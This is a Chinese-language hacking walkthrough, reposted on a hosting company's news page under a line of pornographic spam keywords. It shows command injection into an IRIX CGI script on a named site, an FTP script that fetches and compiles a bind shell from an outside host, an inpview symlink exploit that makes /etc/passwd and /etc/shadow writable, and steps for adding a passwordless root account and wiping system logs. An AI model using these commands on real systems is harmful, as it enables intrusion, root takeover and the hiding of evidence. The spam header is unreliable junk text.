五月综合激情婷婷六月,日韩欧美国产一区不卡,他扒开我内裤强吻我下面视频 ,无套内射无矿码免费看黄,天天躁,日日躁,狠狠躁

新聞動態(tài)

一次嘗試IRIX的過程(nobody shell)

發(fā)布日期:2021-12-31 20:43 | 文章來源:腳本之家
1、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|ls -la
這就是它的利用方法了。其中l(wèi)s -la是我們要運行的命令,我不太習慣在web shell里面干活,還
是要弄出一個shell有個$來得方便些,于是就用ftp。 2、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=echo open www.xfocus.org>/tmp/a
……
……
上面這些其實就是把這一段東西輸進/tmp/a中: open www.xfocus.org <---------別當真,這里沒有這個東西;)
user quack quack <---------我的用戶名密碼
binary
cd /home/quack
lcd /tmp
prompt
get bindshell.c <---------這是一個綁定shell的東西,網上到處有
bye http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|nohup ftp -ivn
這里呢,就是在運行ftp取回東西了;)這么拿文件的話在xferlog里不會有記錄。 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/local/bin/gcc /tmp/bindshell.c -o /tmp/abc 編譯 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/tmp/abc 運行…… 3、現在我們可以telnet上去了 bash# telnet *.*.*.* 12345
Trying *.*.*.*...
Connected to *.*.*.*.
Escape character is ’^]’.
sh -i;
$Content$nbsp;id;
uid=60001(nobody) gid=60001(nobody)
$ 4、利用IRIX的inpview漏洞,該漏洞的描述如下: 某些版本IRIX下的inpview會在/var/tmp/目錄下不安全地建立臨時文件,這些臨時文
件名并不隨機,用戶可以建立一個符號鏈接到其他文件,利用inpview的
setuid-to-root權限覆蓋其他文件,同時對應文件權限被更改成0666。 漏洞利用程序就不貼了,大家自己看看,很簡單的,總之編譯完成之后。 $Content$nbsp;./a.out /etc/passwd; copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/
/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all looking for temporary file... found!
……
…… $Content$nbsp;./a.out /etc/shadow;
……
…… 就把這兩個破文件的權限都改成0666了,往下該干什么活不用我說了吧……
加個uid0的帳號,密碼為空,修改系統(tǒng),刪除sulog\weblog\wtmp\utmp里的記錄以及把/tmp下面的
東西干掉,把passwd和shadow恢復回原樣,再touch一下。走人,睡覺。 btw:一句題外話,現在IRIX的telnetd漏洞很猛呀,還好要有irix系統(tǒng)編譯exploit,少了些小孩做壞
事,還有,那天stardust說還有許多IRIX的lp默認密碼為空,我看了一下,的確如此,印象中mixter
寫了一個小段子專門搜索網上lp空密碼帳號的……

版權聲明:本站文章來源標注為YINGSOO的內容版權均為本站所有,歡迎引用、轉載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網站,禁止在非maisonbaluchon.cn所屬的服務器上建立鏡像,否則將依法追究法律責任。本站部分內容來源于網友推薦、互聯網收集整理而來,僅供學習參考,不代表本站立場,如有內容涉嫌侵權,請聯系alex-e#qq.com處理。

相關文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務

7x24全年不間斷在線

專屬顧問服務

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務熱線

關注
微信

關注官方微信
頂部